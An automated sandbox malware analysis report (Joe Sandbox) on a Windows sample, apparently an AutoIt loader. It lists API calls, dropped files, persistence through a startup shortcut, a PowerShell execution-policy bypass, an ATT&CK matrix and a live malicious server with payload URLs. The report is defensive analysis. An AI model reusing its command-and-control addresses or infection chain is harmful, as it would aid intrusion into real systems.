Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439A8BF4 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,wcscat,wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,wcscpy,1_2_00007FF6439A8BF4
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643982BCF GetUserNameW,1_2_00007FF643982BCF
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643962400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00007FF643962400
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF643941D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_00007FF643941D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: powershell.exe, 00000008.00000002.2359340437.0000022C76D62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 0000000B.00000002.3432483129.00000000014B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2359340437.0000022C76D42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76BA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76B80000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2316221194.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2329295829.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2316384919.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2339893183.0000000004C51000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2332901079.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2329408446.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2324915242.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 0000000B.00000003.2331466897.0000000004D50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: powershell.exe, 00000008.00000002.2357524961.0000022C76AE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2C:\Users\Public\Guard.exe
Source: PPbimZI4LV.exe, 00000001.00000002.2264320173.0000019B59E88000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76AE4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359340437.0000022C76D02000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76B47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2357524961.0000022C76B20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359340437.0000022C76D62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 0000000B.00000002.3432057065.00000000011BE000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3432057065.00000000011CE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000008.00000002.2316243026.0000022C5EAD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: PPbimZI4LV.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: Guard.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_00007FF6439B3940
Source: C:\Users\user\Desktop\PPbimZI4LV.exeCode function: 1_2_00007FF6439B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00007FF6439B4074
Source: C:\Users\Public\Guard.exeCode function: 11_2_0016696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0016696E
Source: C:\Users\Public\Guard.exeCode function: 11_2_00166E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00166E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C5696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_00C5696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 17_2_00C56E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00C56E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
2
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
12
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS36
System Information Discovery
Distributed Component Object ModelInput Capture22
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
321
Masquerading
LSA Secrets51
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577201 Sample: PPbimZI4LV.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 55 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->55 57 g-bing-com.ax-0001.ax-msedge.net 2->57 59 3 other IPs or domains 2->59 63 Antivirus detection for URL or domain 2->63 65 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 10 other signatures 2->69 10 PPbimZI4LV.exe 1 2->10         started        14 wscript.exe 1 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 47 C:\Users\Public\PublicProfile.ps1, ASCII 10->47 dropped 75 Suspicious powershell command line found 10->75 77 Binary is likely a compiled AutoIt script file 10->77 79 Bypasses PowerShell execution policy 10->79 19 powershell.exe 17 10->19         started        22 powershell.exe 14 16 10->22         started        81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->81 26 SwiftWrite.pif 14->26         started        53 127.0.0.1 unknown unknown 16->53 file6 signatures7 process8 dnsIp9 41 C:\Users\Public\Secure.au3, Unicode 19->41 dropped 28 Guard.exe 4 19->28         started        32 conhost.exe 19->32         started        61 139.99.188.124, 49721, 49738, 80 OVHFR Canada 22->61 43 C:\Users\Publicbehaviorgraphuard.exe, PE32 22->43 dropped 71 Drops PE files to the user root directory 22->71 73 Powershell drops PE file 22->73 34 conhost.exe 22->34         started        file10 signatures11 process12 file13 49 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 28->49 dropped 51 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 28->51 dropped 83 Drops PE files with a suspicious file extension 28->83 36 cmd.exe 2 28->36         started        signatures14 process15 file16 45 C:\Users\user\AppData\...\SwiftWrite.url, MS 36->45 dropped 39 conhost.exe 36->39         started        process17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PPbimZI4LV.exe28%VirustotalBrowse
PPbimZI4LV.exe42%ReversingLabsWin64.Adware.RedCap
SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://139.99.188.124/xvDYouPUJ0%Avira URL Cloudsafe
http://139.99.188.124/BlQMSgJx.txt100%Avira URL Cloudmalware
http://139.99.188.1240%Avira URL Cloudsafe
http://139.99.H0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.58.100
truefalse
    high
    ax-0001.ax-msedge.net
    150.171.28.10
    truefalse
      high
      nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://139.99.188.124/xvDYouPUJtrue
        • Avira URL Cloud: safe
        unknown
        http://139.99.188.124/BlQMSgJx.txttrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/JGuard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000000.2314147832.00000000001B9000.00000002.00000001.01000000.00000007.sdmp, SwiftWrite.pif, 00000011.00000000.2473325252.0000000000CA9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drfalse
          high
          http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://g.live.com/odclientsettings/Prod1C:qmgr.db.19.drfalse
                high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://139.99.188.124powershell.exe, 00000008.00000002.2316243026.0000022C5E8F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.microsoftpowershell.exe, 00000008.00000002.2315969638.0000022C5CD25000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://go.micropowershell.exe, 00000008.00000002.2316243026.0000022C5F817000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2316243026.0000022C5FFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.2346716707.0000022C6E744000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://oneget.orgXpowershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000013.00000003.2586107230.000001B7CC740000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.drfalse
                                    high
                                    http://crl.ver)svchost.exe, 00000013.00000002.3434288775.000001B7CC800000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://aka.ms/pscore68powershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://139.99.Hpowershell.exe, 00000008.00000002.2316243026.0000022C5FCF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.autoitscript.com/autoit3/Guard.exe, 0000000B.00000003.2339065061.0000000004E14000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000000B.00000002.3435527571.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.11.dr, Guard.exe.3.drfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.2316243026.0000022C5E6D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2316243026.0000022C5FF4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://oneget.orgpowershell.exe, 00000008.00000002.2316243026.0000022C5FD26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                139.99.188.124
                                                unknownCanada
                                                16276OVHFRtrue
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577201
                                                Start date and time:2024-12-18 09:18:13 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 15s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:23
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:PPbimZI4LV.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3.exe
                                                Detection:MAL
                                                Classification:mal100.expl.evad.winEXE@16/16@2/2
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 47
                                                • Number of non-executed functions: 238
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.190.177.20, 20.223.36.55, 13.107.246.63, 2.16.158.185, 20.12.23.50, 150.171.28.10, 2.16.158.176, 20.199.58.43
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                • Execution Graph export aborted for target powershell.exe, PID 7496 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                TimeTypeDescription
                                                03:19:15API Interceptor80x Sleep call for process: powershell.exe modified
                                                03:19:51API Interceptor2x Sleep call for process: svchost.exe modified
                                                03:20:03API Interceptor2701x Sleep call for process: Guard.exe modified
                                                03:20:21API Interceptor1637x Sleep call for process: SwiftWrite.pif modified
                                                09:19:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                139.99.188.124duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/QWCheljD.txt
                                                pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/QWCheljD.txt
                                                FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/EPDjSfs.txt
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comhttp://ngfreemessage-verifying.freewebhostmost.com/Get hashmaliciousHTMLPhisherBrowse
                                                • 217.20.58.99
                                                uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                • 212.229.88.13
                                                JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                • 217.20.56.100
                                                V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                • 217.20.58.99
                                                BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                • 217.20.57.23
                                                payload_1.htaGet hashmaliciousRedLineBrowse
                                                • 217.20.58.100
                                                69633f.msiGet hashmaliciousVidarBrowse
                                                • 217.20.58.98
                                                msimg32.dllGet hashmaliciousRHADAMANTHYSBrowse
                                                • 217.20.58.100
                                                Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                • 217.20.58.99
                                                Statement Of Account - (USD 19,490.00 ).xlsGet hashmaliciousUnknownBrowse
                                                • 217.20.58.98
                                                ax-0001.ax-msedge.netpt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                • 150.171.27.10
                                                billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exeGet hashmaliciousMetasploitBrowse
                                                • 150.171.28.10
                                                https://mail.donotreply.biz/XWW04VVZpU2JyWTFmVy96T2RUOUEvcEhyMWhFSm5uZElnVUlmb2dTZEdMRFdGSU1UV2V3S3RUNGdrNmNQRFJ4WTFPRHdYYlkraDV3S1YyVVpuU3E3K2p1bWowcEt3M24ySVBLanRDUkwyYitYWExuYTB5YlhVTUhySWZKbGJCTE9oRHl2RCtjR29BbEk3ZEwxZFJaNmNoK29ESk0vTGcxSmtyK0FWTExLWTdxYlQ1Yys1bjNiTUczY0RnPT0tLTU2R0pFM1VwZFRnVndZSWktLXptU2lWOHlQdjR0eGI1K09OQVZtRnc9PQ==?cid=2315575162Get hashmaliciousKnowBe4Browse
                                                • 150.171.27.10
                                                https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
                                                • 150.171.27.10
                                                174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                • 150.171.27.10
                                                nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                • 150.171.27.10
                                                http://uhsee.comGet hashmaliciousUnknownBrowse
                                                • 150.171.27.10
                                                veOECiSunn.exeGet hashmaliciousUnknownBrowse
                                                • 150.171.27.10
                                                V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                • 150.171.28.10
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                OVHFRduyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124
                                                pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124
                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 54.36.60.244
                                                jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 51.75.58.223
                                                https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                • 167.114.27.228
                                                c2.exeGet hashmaliciousXmrigBrowse
                                                • 51.79.145.144
                                                Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                • 51.77.90.246
                                                uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                • 54.36.205.38
                                                https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                • 54.38.113.6
                                                Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                • 94.23.76.52
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\Public\Guard.exeduyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                  pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                                    c2.htaGet hashmaliciousXWormBrowse
                                                      c2.htaGet hashmaliciousXWormBrowse
                                                        c2.htaGet hashmaliciousXWormBrowse
                                                          c2.htaGet hashmaliciousXWormBrowse
                                                            FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                              InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                                vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                                                  fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.7263338996759401
                                                                    Encrypted:false
                                                                    SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0a:9JZj5MiKNnNhoxur
                                                                    MD5:82882BA955554C944E85277B2C6CDF9D
                                                                    SHA1:364FDC8428C2CC3942A67216FB805F63DD8E2716
                                                                    SHA-256:2BD8A15E0D156D3769B4B46EA402CADE598044E2F0E807588402D37BCD60AD0C
                                                                    SHA-512:29662DC0C9B0F33EAB7BE820306D7EF2895D1B4D6F892F3464664B6B3EB6AAB3622F415C1B35EB973BCAA4D9F2BC0EE9E95D79AF3C4E572732A03169B795AE09
                                                                    Malicious:false
                                                                    Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x6e405cd4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.7555275648361202
                                                                    Encrypted:false
                                                                    SSDEEP:1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL
                                                                    MD5:4F593282F8251446A7BCE75C9720E1C6
                                                                    SHA1:52F61D01E8C8294A6BF6861B2248D0459C6692F2
